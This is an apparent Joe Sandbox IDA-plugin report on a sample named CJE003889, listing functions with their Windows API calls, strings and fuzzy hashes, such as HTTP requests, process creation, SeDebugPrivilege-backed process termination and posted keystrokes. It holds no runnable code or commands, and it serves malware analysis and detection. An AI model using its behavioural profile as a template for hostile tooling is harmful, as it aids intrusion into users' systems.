Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: 1c71ff38e99b218cd1b40a8a2ee3d9a5562f2aed3301fbe5a0a4990edea2ad1c
Instruction ID: f3bb5460d26324060a6692d3d3c998892d8a65e88addeddeb85af841ea3f2105
Opcode Fuzzy Hash: 1c71ff38e99b218cd1b40a8a2ee3d9a5562f2aed3301fbe5a0a4990edea2ad1c
Instruction Fuzzy Hash: DA91AA31504605EBCB08EFA4C482BEEF7B4FF04314F548119E899A7251DF31AA9DEBA5

Function 00C62E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00C62EAE

Part of subcall function 00C61DB3: GetClientRect.USER32(?,?), ref: 00C61DDC
Part of subcall function 00C61DB3: GetWindowRect.USER32(?,?), ref: 00C61E1D
Part of subcall function 00C61DB3: ScreenToClient.USER32(?,?), ref: 00C61E45

GetDC.USER32 ref: 00C9CD32
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00C9CD45
SelectObject.GDI32(00000000,00000000), ref: 00C9CD53
SelectObject.GDI32(00000000,00000000), ref: 00C9CD68
ReleaseDC.USER32(?,00000000), ref: 00C9CD70
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00C9CDFB

Strings

U, xrefs: 00C9CCD0

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 755148400963ebe742cd82a3442de56336b8c6d68f8b075e0ef835239057781d
Instruction ID: f3d3ba555d8fcb024f01a7284f8ada7eb202fa16038ab428192ef953ab7e78de
Opcode Fuzzy Hash: 755148400963ebe742cd82a3442de56336b8c6d68f8b075e0ef835239057781d
Instruction Fuzzy Hash: D471D032500605DFCF318F64C8C8AEA7BB5FF59321F14427AED659A2A6C7318E41DB60

Function 00CD1A15 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00CD1A50
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00CD1A7C
InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00CD1ABE
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00CD1AD3
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00CD1AE0
HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00CD1B10
InternetCloseHandle.WININET(00000000), ref: 00CD1B57

Part of subcall function 00CD2483: GetLastError.KERNEL32(?,?,00CD1817,00000000,00000000,00000001), ref: 00CD2498
Part of subcall function 00CD2483: SetEvent.KERNEL32(?,?,00CD1817,00000000,00000000,00000001), ref: 00CD24AD

Strings

, xrefs: 00CD1B01

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
String ID:
API String ID: 2603140658-3916222277
Opcode ID: 1ca14a993c4e2f6158ef3ff8227ec2180cc7fefd53766d13e99ce308f1498b35
Instruction ID: 3daec0bb58a720b5a82a0b3b8a4221031ae6d1d8af035a1b0e921f24c35f189b
Opcode Fuzzy Hash: 1ca14a993c4e2f6158ef3ff8227ec2180cc7fefd53766d13e99ce308f1498b35
Instruction Fuzzy Hash: 28417CB1501218BFEB119F61CC89FBE7BACEF08354F04812BFE159A241E7749E459BA0

Function 00CD8C46 Relevance: 13.9, APIs: 9, Instructions: 438COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,00CEF910), ref: 00CD8D28
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00CEF910), ref: 00CD8D5C
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00CD8ED6
SysFreeString.OLEAUT32(?), ref: 00CD8F00

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: d0172e04072808ea25b76877d77cb1ad3203b033b2c4861ef453a210f6c39391
Instruction ID: fee23cea852011343bf950413c3c7a0d14a03f35a7b3fea58156b501778ad427
Opcode Fuzzy Hash: d0172e04072808ea25b76877d77cb1ad3203b033b2c4861ef453a210f6c39391
Instruction Fuzzy Hash: F6F15775A00209EFCF14DF94C884EAEB7B9FF49314F108499FA15AB251DB31AE4ACB50

Function 00CDF694 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00CDF6B5
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00CDF848
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00CDF86C
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00CDF8AC
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00CDF8CE
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00CDFA4A
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00CDFA7C
CloseHandle.KERNEL32(?), ref: 00CDFAAB
CloseHandle.KERNEL32(?), ref: 00CDFB22

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: d893cf31c98e8811bf4a4f8b9707e96fe3b85068297f4ea736d24c791373f5be
Instruction ID: 044946ad810d45bf2363c5960e8a905d5f0776d568d0fa7a56baf8b3c18610a1
Opcode Fuzzy Hash: d893cf31c98e8811bf4a4f8b9707e96fe3b85068297f4ea736d24c791373f5be
Instruction Fuzzy Hash: 25E19D316042409FC724EF24C891B6ABBE5FF85314F14856EF99A9B3A2CB30DD46DB52

Function 00CC4CC1 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00CC466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00CC3697,?), ref: 00CC468B

Part of subcall function 00CC466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00CC3697,?), ref: 00CC46A4

Part of subcall function 00CC4A31: GetFileAttributesW.KERNEL32(?,00CC370B), ref: 00CC4A32

lstrcmpiW.KERNEL32(?,?), ref: 00CC4D40
_wcscmp.LIBCMT ref: 00CC4D5A
MoveFileW.KERNEL32(?,?), ref: 00CC4D75

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: 2d32979dde4adaaf90a72b924da53d5c100907a8b493818511ab03f27b3415be
Instruction ID: b8c2577617842bd50712063310fc80427fd314219de096604b518005929fddc4
Opcode Fuzzy Hash: 2d32979dde4adaaf90a72b924da53d5c100907a8b493818511ab03f27b3415be
Instruction Fuzzy Hash: 145165B24083859BC724EBA0D891EDFB3ECAF84354F10492EF586D3151EF30A689D756

Function 00CE8645 Relevance: 13.7, APIs: 9, Instructions: 168COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00CE86FF

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 55cec5c82a82b1d6a7847ca624aab276a527c4d20d5e7ed498966db25cf35924
Instruction ID: 719a4adb9cfbff9a75f44c2db9ab01fc3a587aab84738924a8064164ebd9de6a
Opcode Fuzzy Hash: 55cec5c82a82b1d6a7847ca624aab276a527c4d20d5e7ed498966db25cf35924
Instruction Fuzzy Hash: 465183305002C4FFDB309B26DC85FAD7BA9AB05720F604515F969EA1E1CF71AA88EB50

Function 00C62B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00C9C2F7
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00C9C319
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00C9C331
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00C9C34F
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00C9C370
DestroyIcon.USER32(00000000), ref: 00C9C37F
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00C9C39C
DestroyIcon.USER32(?), ref: 00C9C3AB

Part of subcall function 00CEA4AF: DeleteObject.GDI32(00000000), ref: 00CEA4E8

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
String ID:
API String ID: 2819616528-0
Opcode ID: 64fa120ecf52f0fa030a9b98109b9bec36ceaabf5f888cb3e78700c5cee090ce
Instruction ID: edd56e61233701a1f40a9a92b7898d05293e904ded753adfb30b0f0f4be4ef23
Opcode Fuzzy Hash: 64fa120ecf52f0fa030a9b98109b9bec36ceaabf5f888cb3e78700c5cee090ce
Instruction Fuzzy Hash: C2516A70600A49AFDB20DF25DC85FAA7BA5FB58310F104528F952D72A0D7B0EE91EB60

Function 00CB966E Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00CBA82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00CBA84C
Part of subcall function 00CBA82C: GetCurrentThreadId.KERNEL32 ref: 00CBA853
Part of subcall function 00CBA82C: AttachThreadInput.USER32(00000000,?,00CB9683,?,00000001), ref: 00CBA85A

MapVirtualKeyW.USER32(00000025,00000000), ref: 00CB968E
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00CB96AB
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00CB96AE
MapVirtualKeyW.USER32(00000025,00000000), ref: 00CB96B7
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00CB96D5
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00CB96D8
MapVirtualKeyW.USER32(00000025,00000000), ref: 00CB96E1
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00CB96F8
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00CB96FB

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: 1100bf969b33f3eabd5901fdcc6c55be824adae2744241361c0d168914e14cd9
Instruction ID: 628f44deca064d12339fafdb5ff04ad0578bcd36509217a19d50c3cca70bf312
Opcode Fuzzy Hash: 1100bf969b33f3eabd5901fdcc6c55be824adae2744241361c0d168914e14cd9
Instruction Fuzzy Hash: 2911CEB1910618BFF6106B609C89FAE3F2DEB4C750F100429F244AB0E0C9F25C119AA4

Function 00CB8921 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00CB853C,00000B00,?,?), ref: 00CB892A
HeapAlloc.KERNEL32(00000000,?,00CB853C,00000B00,?,?), ref: 00CB8931
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00CB853C,00000B00,?,?), ref: 00CB8946
GetCurrentProcess.KERNEL32(?,00000000,?,00CB853C,00000B00,?,?), ref: 00CB894E
DuplicateHandle.KERNEL32(00000000,?,00CB853C,00000B00,?,?), ref: 00CB8951
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00CB853C,00000B00,?,?), ref: 00CB8961
GetCurrentProcess.KERNEL32(00CB853C,00000000,?,00CB853C,00000B00,?,?), ref: 00CB8969
DuplicateHandle.KERNEL32(00000000,?,00CB853C,00000B00,?,?), ref: 00CB896C
CreateThread.KERNEL32(00000000,00000000,00CB8992,00000000,00000000,00000000), ref: 00CB8986

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: ce3138df1024fa88f72e218b420affa46d8da176aa91461c46ec13927babcfd9
Instruction ID: 8fe591f3b96b1f3d35bd9b68ac9996eb826ab8b73c20a242eacc0d0a2beaa629
Opcode Fuzzy Hash: ce3138df1024fa88f72e218b420affa46d8da176aa91461c46ec13927babcfd9
Instruction Fuzzy Hash: 6701A8B5640348FFE610ABA5DC89F6F3BACEB89711F418425FA05DF1A1CA709801CA20

Function 00CD9B23 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON

Download Yara Rule

Strings

NULL Pointer assignment, xrefs: 00CD9BA4, 00CD9EC8
Not an Object type, xrefs: 00CD9B7B

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 11231f851406dbd53b2c0778f763cb87fe4a20cfa1e988ab5d1fceb543f71552
Instruction ID: 6df668e10fc7473d941a0b096f8f63f569f8d091d6ada8db049f4171351c6c60
Opcode Fuzzy Hash: 11231f851406dbd53b2c0778f763cb87fe4a20cfa1e988ab5d1fceb543f71552
Instruction Fuzzy Hash: 43C19475A00219AFDF10DF98D884BAEB7F5FB88314F14856AEA15A7380E7709E45CB50

Function 00CD9113 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00CD9167
VariantInit.OLEAUT32(?), ref: 00CD9238
VariantInit.OLEAUT32(?), ref: 00CD9339
VariantClear.OLEAUT32(?), ref: 00CD9343
VariantClear.OLEAUT32(?), ref: 00CD93A0

Strings

Null Object assignment in FOR..IN loop, xrefs: 00CD91C8, 00CD92F6, 00CD93AE
Incorrect Object type in FOR..IN loop, xrefs: 00CD931C

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-625585964
Opcode ID: eee187d60c56558f5c01f9fc1690e0222e67bc51f86ff49b11c22e6918bc73f4
Instruction ID: c9070589d38a0b7f30177742afdc8400685c444c8fea9ffde05b2c7d34e5ceb6
Opcode Fuzzy Hash: eee187d60c56558f5c01f9fc1690e0222e67bc51f86ff49b11c22e6918bc73f4
Instruction Fuzzy Hash: 5E919175A00215ABDF24DFA5C888FAEBBB8EF45714F10811AF615AB290D7709A45CFA0

Function 00CD975D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

Part of subcall function 00CB710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00CB7044,80070057,?,?,?,00CB7455), ref: 00CB7127
Part of subcall function 00CB710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00CB7044,80070057,?,?), ref: 00CB7142
Part of subcall function 00CB710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00CB7044,80070057,?,?), ref: 00CB7150
Part of subcall function 00CB710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00CB7044,80070057,?), ref: 00CB7160

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00CD9806
_memset.LIBCMT ref: 00CD9813
_memset.LIBCMT ref: 00CD9956
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00CD9982
CoTaskMemFree.OLE32(?), ref: 00CD998D

Strings

NULL Pointer assignment, xrefs: 00CD99DB

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: 15816f3e1f9613f81e4957bd0952fd161d94118e3fb7495098f1bba5a4bb7e20
Instruction ID: f0a387970e56f43e65fcbe91f8e77a4b9d07d33597a16cf4192a57e28190b55c
Opcode Fuzzy Hash: 15816f3e1f9613f81e4957bd0952fd161d94118e3fb7495098f1bba5a4bb7e20
Instruction Fuzzy Hash: 2F914871D00229EBDB20DFA5DC84EDEBBB9EF08310F20415AF519A7291DB719A44DFA0

Function 00CE6D80 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00CE6E24
SendMessageW.USER32(?,00001036,00000000,?), ref: 00CE6E38
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00CE6E52
_wcscat.LIBCMT ref: 00CE6EAD
SendMessageW.USER32(?,00001057,00000000,?), ref: 00CE6EC4
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00CE6EF2

Strings

SysListView32, xrefs: 00CE6DF6

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: a7c8e6fc2822fa58d1a83476d3af25589bf992a049546ec9c4f4e484a251d2c9
Instruction ID: 0fb704466c12812f9f8804c02dbcff48e9d0678b60879feaf6a6c783c8161233
Opcode Fuzzy Hash: a7c8e6fc2822fa58d1a83476d3af25589bf992a049546ec9c4f4e484a251d2c9
Instruction Fuzzy Hash: 5041B271A00388AFDB219F65CC85BEEB7F9EF18790F10042AF594E72D1D6719E858B60

Function 00CDE933 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 00CC3C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00CC3C7A
Part of subcall function 00CC3C55: Process32FirstW.KERNEL32(00000000,?), ref: 00CC3C88
Part of subcall function 00CC3C55: CloseHandle.KERNEL32(00000000), ref: 00CC3D52

OpenProcess.KERNEL32(00000001,00000000,?), ref: 00CDE9A4
GetLastError.KERNEL32 ref: 00CDE9B7
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00CDE9E6
TerminateProcess.KERNEL32(00000000,00000000), ref: 00CDEA63
GetLastError.KERNEL32(00000000), ref: 00CDEA6E
CloseHandle.KERNEL32(00000000), ref: 00CDEAA3

Strings

SeDebugPrivilege, xrefs: 00CDE9C2

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: b15c3dd50f706e5ef5b33f558c5e6373e21b91643b41bcd108569e7d6bd2e7f7
Instruction ID: e7185aa07c8030e7546ca22a5a8c7b3c09121cf272f8bcae9f9b29427b81c697
Opcode Fuzzy Hash: b15c3dd50f706e5ef5b33f558c5e6373e21b91643b41bcd108569e7d6bd2e7f7
Instruction Fuzzy Hash: D44177712002019FDB24EF14CCA5BAEBBA5AF44314F048419FA469F3D2CB74A909EB91

Function 00CC2F94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

